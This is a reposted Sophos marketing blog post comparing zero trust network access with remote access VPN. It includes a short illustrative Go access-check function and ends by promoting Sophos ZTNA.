https://www.trendmicro.com/en_us/research/22/e/platform-centric-enterprise-cybersecurity-protection.html

Zero trust network access (ZTNA) versus remote access VPN

Remote access VPN has long served us well, but the recent increase in remote working has cast a spotlight on the limitations of this aging technology.

Remote access VPN has been a staple of most networks for decades, providing a secure method to remotely access systems and resources on the network. However, VPN was developed to mimic the experience of being in the office. Once you’re in, you’ve got broad access to everything.

Zero trust network access (ZTNA), on the other hand, can be summed up in four words: trust nothing, verify everything. It’s based on the principle that any connection to your network should be treated as hostile until it’s been authenticated, authorized, and granted access to resources.

Simply put: with virtual private networking (VPN), you’re providing broad network access. With ZTNA, you’re providing specific application access.

Traditional remote access VPN vs. ZTNA

There are several differences between traditional remote access VPN and ZTNA. Here are some important ones, covering trust, device health, administration, and more.

Trust

With remote access VPN, users are implicitly trusted with broad access to resources, which can create serious security risks.

ZTNA treats each user and device individually so that only the resources that user and device are allowed to access are made available. Instead of granting users complete freedom of movement on the network, individual tunnels are established between the user and the specific gateway for the application they’re authorized to access – and nothing more.

Device health

Remote access VPN has no awareness of the health state of a connecting device. If a compromised device connects via VPN, it could affect the rest of the network.

ZTNA integrates device compliance and health into access policies, giving you the option to exclude non-compliant, infected, or compromised systems from accessing corporate applications and data. This greatly reduces the risk of data theft or leakage.
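In code terms, the contrast between the two models is roughly the shape of the access check. The sketch below is generic and illustrative, not Sophos’s implementation: access is granted only when identity, device health, and per-application authorization all pass.

```go
package main

import "fmt"

// Invented types for illustration; no vendor's actual policy model.
type Device struct {
	Compliant bool // patched, encrypted, not flagged as infected
}

type User struct {
	Name          string
	Authenticated bool
	AllowedApps   map[string]bool
}

// authorize applies "trust nothing, verify everything": every request is
// checked against identity, device health, and the specific application.
func authorize(u User, d Device, app string) error {
	switch {
	case !u.Authenticated:
		return fmt.Errorf("deny %s: not authenticated", u.Name)
	case !d.Compliant:
		return fmt.Errorf("deny %s: device out of compliance", u.Name)
	case !u.AllowedApps[app]:
		return fmt.Errorf("deny %s: not authorized for %s", u.Name, app)
	}
	return nil // establish a tunnel to this one application only
}

func main() {
	u := User{Name: "pat", Authenticated: true, AllowedApps: map[string]bool{"crm": true}}
	fmt.Println(authorize(u, Device{Compliant: true}, "crm"))  // <nil>: access granted
	fmt.Println(authorize(u, Device{Compliant: false}, "crm")) // denied: device health
}
```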

Remote connections

Remote access VPN provides a single point-of-presence on the network, which means a potentially inefficient backhauling of traffic from multiple locations, datacenters, or applications through the remote access VPN tunnel.

ZTNA functions equally well and securely from any connection point, be it home, hotel, coffee shop, or office. Connection management is secure and transparent regardless of where the user and device are located, making it a seamless experience no matter where the user is working.

ZTNA is also a great way to ensure greater security controls during Remote Desktop Protocol (RDP) sessions. Known challenges with RDP include exposed default ports, no support for multi-factor authentication (MFA), broad network access, and, of course, security vulnerabilities. RDP server vulnerabilities and mistakenly open RDP connections can be directly exploited by attackers, who leverage such exploits to pass themselves off as trusted RDP users. With ZTNA, such connections are treated as hostile until they pass authentication.

Visibility

Remote access VPN is unaware of the traffic and usage patterns it is facilitating, making visibility into user activity and application usage more challenging.

Since ZTNA access is micro-segmented, it can offer increased visibility into application activity. This makes it much easier to monitor application status, plan capacity, and manage and audit licensing.

User experience

Remote access VPN clients are notorious for offering a poor user experience, adding latency or negatively impacting performance, suffering from connectivity issues, and generally being a burden on the helpdesk.

ZTNA provides a frictionless, seamless end-user experience by automatically establishing secure connections on demand. This is all done behind the scenes, so most users won’t even be aware of the ZTNA solution that’s helping protect their data.

Administration

Remote access VPN clients are difficult to set up and deploy, and enrolling new users and decommissioning departing ones is cumbersome. VPN is also challenging to administer on the firewall or gateway side, especially with multiple nodes, firewall access rules, IP management, traffic flows, and routing. It quickly becomes a full-time job.

ZTNA solutions are often much leaner, cleaner, and easier to deploy and manage. They’re also more agile in quickly changing environments with users, apps, and devices coming and going – making day-to-day administration quick and painless.

What to look for in a ZTNA solution

Be sure to consider these important capabilities when comparing ZTNA solutions from different vendors:

Cloud-delivered, cloud-managed

Cloud management offers tremendous benefits: being able to get up and running quickly, reduced management infrastructure, easy deployment and enrollment, and instant, secure access from anywhere on any device.

Integration with your other cybersecurity solutions

While most ZTNA solutions can work perfectly fine as standalone products, there are significant benefits from having a solution that is tightly integrated with your other cybersecurity products, such as your firewalls and endpoints. A common, integrated cloud management console can be a force multiplier for reducing training time and day-to-day management overhead.

It can also provide unique insights across your various IT security products, especially if they share telemetry. This can dramatically bolster security and offer real-time response when a compromised device or threat gets on the network.

User and management experience

Make sure the solution you’re considering offers both an excellent end-user experience and easy administration and management. With more users working remotely, enrollment and efficient device setup are critical when it comes to getting new users productive as quickly as possible.

Be sure to pay attention to how the ZTNA agent is deployed and how easy it is to add new users to policies. Also ensure the solution you’re investing in offers a smooth, frictionless experience for end users. It should also provide visibility into application activity to help you be proactive in identifying peak load, capacity, license usage, and even application issues.

Sophos ZTNA

Sophos ZTNA has been designed from the start to make zero trust network access easy, integrated, and secure.

It’s cloud-delivered, cloud-managed, and integrated into Sophos Central, the world’s most trusted cybersecurity platform. From Sophos Central, you can manage not only ZTNA, but also your Sophos firewalls, endpoints, server protection, mobile devices, cloud security, email protection, and much more.

Sophos ZTNA is also unique in that it integrates tightly with both Sophos Firewall and Sophos Intercept X-protected endpoints to share real-time device health between the firewall, device, ZTNA, and Sophos Central to automatically respond to threats or non-compliant devices. It acts like a round-the-clock administrator, automatically limiting access and isolating compromised systems until they’re cleaned up.

Sophos customers agree that the time-saving benefits of a fully integrated Sophos cybersecurity solution are enormous. They say that using the Sophos suite of products together for automatic threat identification and response is like doubling the size of their IT team. Of course, Sophos ZTNA will work with any other vendor’s security products, but it works uniquely well with the rest of the Sophos ecosystem to provide tangible real-world benefits for visibility, protection, and response.

Visit Sophos.com/ZTNA to learn more or try it for yourself.

Source :
https://news.sophos.com/en-us/2022/05/20/zero-trust-network-access-ztna-versus-remote-access-vpn/